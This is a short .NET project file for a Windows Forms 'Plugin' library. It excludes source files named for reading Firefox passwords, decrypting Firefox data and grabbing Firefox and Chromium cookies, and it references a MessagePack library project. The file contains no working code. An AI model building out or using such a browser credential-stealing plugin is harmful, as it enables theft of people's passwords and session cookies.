<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Library</OutputType>
    <TargetFramework>net10.0-windows</TargetFramework>
    <UseWindowsForms>true</UseWindowsForms>
    <RootNamespace>Plugin</RootNamespace>
    <Deterministic>true</Deterministic>
  </PropertyGroup>
  <ItemGroup>
    <Compile Remove="Browsers\Firefox\Firefox.cs" />
    <Compile Remove="Browsers\Firefox\FirefoxPassReader.cs" />
    <Compile Remove="Browsers\Firefox\Cookies\FFCookiesGrabber.cs" />
    <Compile Remove="Browsers\Firefox\FFDecryptor.cs" />
    <Compile Remove="Browsers\Chromium\ChromiumCookies.cs" />
  </ItemGroup>
  <ItemGroup>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
  </ItemGroup>
  <ItemGroup>
    <ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj" />
  </ItemGroup>
</Project>
